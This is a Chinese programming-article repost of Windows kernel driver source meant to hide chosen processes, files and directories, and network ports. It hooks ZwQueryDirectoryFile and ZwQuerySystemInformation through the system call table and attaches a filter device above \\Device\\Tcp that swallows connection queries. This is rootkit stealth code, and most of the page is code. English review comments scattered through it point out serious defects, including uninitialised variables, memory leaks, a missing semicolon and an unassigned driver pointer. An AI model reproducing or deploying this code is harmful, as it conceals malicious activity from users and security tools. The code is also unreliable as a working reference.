日期:2011-03-22 13:55:00  来源:本站整理

隐藏任意进程、目录/文件、注册表、端口[VC/C++编程]





查找进程、目录/文件、注册表等操作,操作系统最终都会调用 ZwQueryDirectoryFile、ZwQuerySystemInformation、ZwXXXValueKey 等函数。要想拦截这些函数以达到隐藏的目的,需要先自己实现以上函数,并修改系统维护的一个 SYSCALL 表,使其指向自己预先定义的函数。由于 SYSCALL 表在用户层不可见,所以必须编写 DRIVER,在 RING 0 下才能修改。关于如何修改,已有文章详细介绍过,这里不再详述(可以参见 sysinternals.com 或 WebCrazy 所写的文章)。查找端口用的是 TDI 查询。TDI 导出了两个设备 \\Device\\Tcp 与 \\Device\\Udp。我们可以利用设备过滤驱动的方法写一个 DRIVER,把这两个设备的全部 IRP 包接管过来,进行处理后再传给下层驱动,以达到隐藏任意端口的目的。上述提到的方法不是新东西,是 N 年前就已经有的老技术。俺目前把它贴出来只不过是为了充版面、灌水罢了,高手们还是别看了。下面是俺的 DRIVER 中隐藏任意进程、目录/文件、端口的代码片段。

(注册表操作在 RegMon 中写得很详细,这里就不列出了)

/* Same layout as the Win32 FILETIME: a 64-bit timestamp split into two
 * 32-bit halves.  Redeclared here, presumably because the kernel headers
 * this driver includes do not provide it — confirm against the build. */
typedef struct _FILETIME
{
  DWORD dwLowDateTime;   /* low 32 bits of the timestamp */
  DWORD dwHighDateTime;  /* high 32 bits of the timestamp */
}FILETIME;
/* Hand-laid-out view of one directory entry in the buffer filled by
 * ZwQueryDirectoryFile.  The *Unknown* members are bytes the author did not
 * identify; only dwLenToNext and suName are read by the code on this page.
 * NOTE(review): the layout resembles FILE_BOTH_DIR_INFORMATION — confirm it
 * matches the information class callers actually request, because
 * HookZwQueryDirectoryFile applies it to every FileInfoClass. */
typedef struct _DirEntry
{
  DWORD dwLenToNext;        /* byte offset to the next entry; 0 = last entry */
  DWORD dwAttr;
  FILETIME ftCreate, ftLastAccess, ftLastWrite;
  DWORD dwUnknown[ 2 ];
  DWORD dwFileSizeLow;
  DWORD dwFileSizeHigh;
  DWORD dwUnknown2[ 3 ];
  WORD wNameLen;            /* length of suName in bytes; never read on this page */
  WORD wUnknown;
  DWORD dwUnknown3;
  WORD wShortNameLen;
  WCHAR swShortName[ 12 ];
  WCHAR suName[ 1 ];        /* variable-length name, NOT NUL-terminated */
} DirEntry, *PDirEntry;
/* Undocumented per-thread record that trails each _SYSTEM_PROCESSES record
 * in a SystemProcessInformation buffer.  Declared only so that
 * _SYSTEM_PROCESSES::Threads has a type; nothing on this page reads it. */
struct _SYSTEM_THREADS
{
  LARGE_INTEGER KernelTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER CreateTime;
  ULONG WaitTime;
  PVOID StartAddress;
  CLIENT_ID ClientIs;
  KPRIORITY Priority;
  KPRIORITY BasePriority;
  ULONG ContextSwitchCount;
  ULONG ThreadState;
  KWAIT_REASON WaitReason;
};
/* Undocumented per-process record returned by ZwQuerySystemInformation for
 * class 5 (SystemProcessInformation).  Records form a chain: NextEntryDelta
 * is the byte offset to the next record and 0 marks the last one, which is
 * how HookZwQuerySystemInformation walks and unlinks them.
 * NOTE(review): field offsets are Windows-version specific — confirm against
 * the target build before relying on anything past NextEntryDelta. */
struct _SYSTEM_PROCESSES
{
  ULONG NextEntryDelta;       /* byte offset to next record; 0 = last */
  ULONG ThreadCount;
  ULONG Reserved[6];
  LARGE_INTEGER CreateTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER KernelTime;
  UNICODE_STRING ProcessName; /* image name; never read by the hook below */
  KPRIORITY BasePriority;
  ULONG ProcessId;
  ULONG InheritedFromProcessId;
  ULONG HandleCount;
  ULONG Reserved2[2];
  VM_COUNTERS VmCounters;
  IO_COUNTERS IoCounters;
  struct _SYSTEM_THREADS Threads[1]; /* ThreadCount records follow */
};
// 躲藏目录/文件
/*
 * Replacement for ZwQueryDirectoryFile.  Forwards every argument to the saved
 * original (OldZwQueryDirectoryFile) and, when it succeeds, walks the returned
 * DirEntry chain and splices out each entry whose upper-cased ANSI name begins
 * with a list_head entry flagged PTR_HIDEDIR.
 *
 * Parameters: identical to ZwQueryDirectoryFile; all are passed through.
 * Returns: the original call's status, except that a buffer whose only entry
 *          was removed returns 0x80000006 (STATUS_NO_MORE_FILES).
 *
 * NOTE(review): FileInfoClass is never inspected, so FileInformationBuffer is
 * treated as a DirEntry chain for every information class.  The buffer is a
 * caller-supplied pointer used without ProbeForWrite/__try, the walk trusts
 * every dwLenToNext, and nothing is bounded by pIoStatusBlock->Information.
 */
NTSTATUS HookZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
  NTSTATUS rc;
  CHAR aProcessName[80];               /* unused */
  ANSI_STRING ansiFileName,ansiDirName; /* upper-cased copy / raw ANSI copy of the entry name */
  UNICODE_STRING uniFileName;
  PP_DIR ptr;                          /* cursor over the hide list rooted at list_head */
  WCHAR ParentDirectory[1024] = {0};   /* unused; 2 KiB of kernel stack zeroed on every call */
  int BytesReturned;                   /* unused */
  PVOID Object;                        /* unused */
// Run the original ZwQueryDirectoryFile first; the filtering below works on its output
  rc=((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))(hFile,hEvent,IoApcRoutine,
    IoApcContext,pIoStatusBlock,FileInformationBuffer,FileInformationBufferLength,
    FileInfoClass,bReturnOnlyOneEntry,PathMask,bRestartQuery);
  if(NT_SUCCESS(rc))
  {
   PDirEntry p;      /* entry currently being examined */
   PDirEntry pLast;  /* previous surviving entry; NULL while p is the first */
   BOOL bLastOne;    /* p has dwLenToNext == 0 */
   int found;        /* p's name matched a PTR_HIDEDIR list entry */
   p = (PDirEntry)FileInformationBuffer; // view the result buffer as a DirEntry chain
   pLast = NULL;
 
   do
   {
    bLastOne = !( p->dwLenToNext );  /* a zero link marks the final entry */
    /* suName is not NUL-terminated (its length is wNameLen, which is never
     * read), so RtlInitUnicodeString scans for a terminator beyond the entry. */
    RtlInitUnicodeString(&uniFileName,p->suName);
    /* Both conversions allocate (AllocateDestinationString == TRUE) on every
     * iteration, but the strings are freed only once after the loop, so every
     * pair except the last leaks. */
    RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
    RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);
    RtlUpperString(&ansiFileName,&ansiDirName); /* ansiFileName = upper-case of ansiDirName */
   
    found=0;
    // Does any PTR_HIDEDIR entry in the list prefix-match this name?
    for(ptr = list_head; ptr != NULL; ptr = ptr->next)
    {
     if (ptr->flag != PTR_HIDEDIR) continue;
     /* Compares strlen(ptr->name) bytes without checking ansiFileName.Length,
      * so a shorter entry name is read past the end of its buffer. */
     if( RtlCompareMemory( ansiFileName.Buffer, ptr->name,strlen(ptr->name) ) == strlen(ptr->name))
     {
      found=1;
      break;
     }
    }//end for
    // Matched: unlink this entry from the chain
    if(found)
    {
     if(bLastOne)
     {
      if(p == (PDirEntry)FileInformationBuffer )
      {
       rc = 0x80000006; // STATUS_NO_MORE_FILES: the only entry was removed
      }
      else
       pLast->dwLenToNext = 0; /* previous survivor becomes the last entry */
      break;
     }
     else
     {
      /* Shift the remaining entries down over this one.  iLeft is computed
       * from the buffer length rather than the bytes actually returned, and
       * the source and destination overlap yet RtlCopyMemory (memcpy
       * semantics) is used rather than RtlMoveMemory. */
      int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
      int iLeft = (DWORD)FileInformationBufferLength - iPos - p->dwLenToNext;
      RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft );
      continue; /* re-examine p, which now holds the shifted-in entry; pLast unchanged */
     }
    }
    pLast = p;
    p = (PDirEntry)((char *)p + p->dwLenToNext );
   }while( !bLastOne );
  RtlFreeAnsiString(&ansiDirName);
  RtlFreeAnsiString(&ansiFileName);
  }
  return(rc);
}
// 躲藏进程
/*
 * Replacement for ZwQuerySystemInformation.  Forwards to the saved original
 * (OldZwQuerySystemInformation) and, when the class is 5
 * (SystemProcessInformation) and the call succeeded, walks the
 * _SYSTEM_PROCESSES chain in SystemInformation and unlinks records whose
 * name matches a list_head entry flagged PTR_HIDEPROC.
 *
 * Parameters: identical to ZwQuerySystemInformation; all are passed through.
 * Returns: the original call's status.  ReturnLength is never adjusted after
 *          records are unlinked.
 *
 * NOTE(review): process_name is declared but never assigned before its
 * Length and Buffer are read, so the length test and memcmp below operate on
 * indeterminate stack contents — undefined behaviour.  The caller-supplied
 * buffer is also written without ProbeForWrite/__try.
 */
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
  NTSTATUS rc;
  ANSI_STRING process_name,process_uname,process_name1,process_name2; /* none of these is ever assigned */
  BOOL g_hide_proc = TRUE;  /* a local, always TRUE, despite the g_ prefix */
  CHAR aProcessName[80];    /* unused */
  PP_DIR ptr;               /* cursor over the hide list rooted at list_head */
  int found;                /* current record matched a PTR_HIDEPROC entry */
  // Run the original ZwQuerySystemInformation first
  rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(SystemInformationClass,
      SystemInformation,SystemInformationLength,ReturnLength );
  if(NT_SUCCESS(rc ))
  {
   if( g_hide_proc && (5 == SystemInformationClass)) /* 5 == SystemProcessInformation */
   {
    // View the result buffer as a chain of _SYSTEM_PROCESSES records
    struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
    struct _SYSTEM_PROCESSES *prev = NULL; /* last record kept; NULL while curr is the first */
    // Walk the chain
    while(curr)
    {
     if((0 < process_name.Length) && (255 > process_name.Length)) /* reads an uninitialised ANSI_STRING */
     {
      found=0;
      // Prefix-compare against every PTR_HIDEPROC entry (no length check on process_name)
      for(ptr=list_head;ptr!=NULL;ptr=ptr->next )
      {
       if(ptr->flag != PTR_HIDEPROC) continue ;
       if(memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
       {
        found =1;
       }
      }
      /* Unlink while matched.  found is recomputed at the bottom from the
       * same process_name and the same list, so it keeps whatever value it
       * had: once true, every remaining record is unlinked until the chain
       * ends. */
      while(found)
      {
       if(prev)
       {
        if(curr->NextEntryDelta)
        {
         prev->NextEntryDelta += curr->NextEntryDelta; /* skip curr */
        }
        else
        {
         prev->NextEntryDelta = 0; /* curr was last; prev becomes last */
        }
       }
       else
       {
        /* curr is the first record.  Casting an lvalue is a compiler
         * extension, and this only advances the local copy of the pointer
         * parameter — the caller's buffer still starts with this record. */
        if(curr->NextEntryDelta)
        {
         (char *)SystemInformation += curr->NextEntryDelta;
        }
        else
        {
         SystemInformation = NULL;
        }
       }
       if(curr->NextEntryDelta)
        ((char *)curr += curr->NextEntryDelta); /* same cast-as-lvalue extension */
       else
       {
         curr = NULL;break;
       }
       // Re-evaluate the match for the record curr now points at
       found = 0;
       for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
       {
        if (ptr->flag != PTR_HIDEPROC) continue ;
        if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
        {
         found = 1;
        }
       }
      }
     }
     if(curr != NULL)
     {
      prev = curr;
      if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
      else curr = NULL;
     }
    }
   }
  }
  return(rc);
}
//躲藏端口
/* Attaches a filter device on top of \Device\Tcp and routes the IRPs the
 * TCP driver handles through PassThrough.
 * NOTE(review): this is a fragment, presumably lifted from DriverEntry —
 * DriverObject, FileObject, i and DEVICE_EXTENSION are used but not declared
 * here, and the `return status` statements only make sense inside a
 * function.  TcpDriver is declared but never assigned before it is
 * dereferenced in the loop below. */
PDEVICE_OBJECT m_TcpgetDevice;  /* device returned by IoAttachDeviceToDeviceStack; target of IoCallDriver in PassThrough */
PDEVICE_OBJECT TcpDevice;       /* \Device\Tcp, resolved via IoGetDeviceObjectPointer */
UNICODE_STRING TcpDeviceName;
PDRIVER_OBJECT TcpDriver;       /* never assigned on this page */
PDEVICE_OBJECT TcpgetDevice;
PDEVICE_OBJECT FilterDevice     /* missing ';' as published */
PDRIVER_DISPATCH Empty;         /* dispatch value taken to mean "not handled" */
NTSTATUS status;
Empty = DriverObject->MajorFunction[IRP_MJ_CREATE]; /* assumes the IRP_MJ_CREATE slot still holds the default dispatch */
RtlInitUnicodeString( &TcpDeviceName, L"\\Device\\Tcp");
// Resolve the existing TCP device (takes a reference on FileObject)
status = IoGetDeviceObjectPointer( &TcpDeviceName,FILE_ALL_ACCESS,&FileObject,&TcpDevice);
if(!NT_SUCCESS(status))
{
  DbgPrint("IoGetDeviceObjectPointer error!\n");
  return status;
}
DbgPrint("IoGetDeviceObjectPointer ok!\n");
// Create the (unnamed) filter device
status = IoCreateDevice( DriverObject,sizeof(DEVICE_EXTENSION),NULL,
      FILE_DEVICE_UNKNOWN,0,FALSE,&FilterDevice);
if(!NT_SUCCESS(status))
{
  return status; /* FileObject reference from above is not released on this path */
}
// Attach above \Device\Tcp.  NOTE(review): nothing copies the lower device's
// Flags/Characteristics onto FilterDevice — confirm this is intended.
TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice);
if(!TcpgetDevice)
{
  IoDeleteDevice(FilterDevice);
  DbgPrint("IoAttachDeviceToDeviceStack error!\n");
  return STATUS_SUCCESS; /* reports success although the attach failed; FileObject is not released */
}
m_TcpgetDevice = TcpgetDevice;
// Route every major function the TCP driver implements, and this driver does
// not, through PassThrough.  The bound excludes index IRP_MJ_MAXIMUM_FUNCTION
// itself; TcpDriver is uninitialised at this point.
for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
{
  if((TcpDriver->MajorFunction[i]!=Empty)&&(DriverObject->MajorFunction[i]==Empty))
  {
   DriverObject->MajorFunction[i] = PassThrough;
  }
}
ObDereferenceObject(FileObject); /* release the reference taken by IoGetDeviceObjectPointer */
/*
 * Dispatch routine installed for every major function forwarded to the TCP
 * filter.  Completes query IRPs immediately with STATUS_SUCCESS and sends
 * everything else down to m_TcpgetDevice.
 *
 * DeviceObject: the filter device (unused).
 * Irp:          the request to handle.
 * Returns: STATUS_SUCCESS for a swallowed query, otherwise the lower
 *          driver's status from IoCallDriver.
 *
 * NOTE(review): IoControlCode is read without first checking that the IRP's
 * MajorFunction is a device-control request, although this routine is also
 * installed for other major functions, where that union member holds other
 * data.  A swallowed IRP returns with IoStatus.Information left unset.
 * QUERY_INFORMATION_EX and GenericCompletion are not defined on this page.
 */
NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
  NTSTATUS status;            /* unused */
  PIO_STACK_LOCATION pIrpStack;
  pIrpStack = IoGetCurrentIrpStackLocation( Irp );
// A query request is completed here and never reaches the TCP driver
if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX)
{
  // (author's note: a specific port could be examined here)
  Irp->IoStatus.Status=STATUS_SUCCESS;
  IoCompleteRequest(Irp,IO_NO_INCREMENT);
  return STATUS_SUCCESS;
}
// Copy our stack location to the next one and watch completion
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine( Irp,GenericCompletion,NULL,TRUE,TRUE,TRUE);
// Forward to the device we attached above (m_TcpgetDevice)
return IoCallDriver( m_TcpgetDevice, Irp);
}

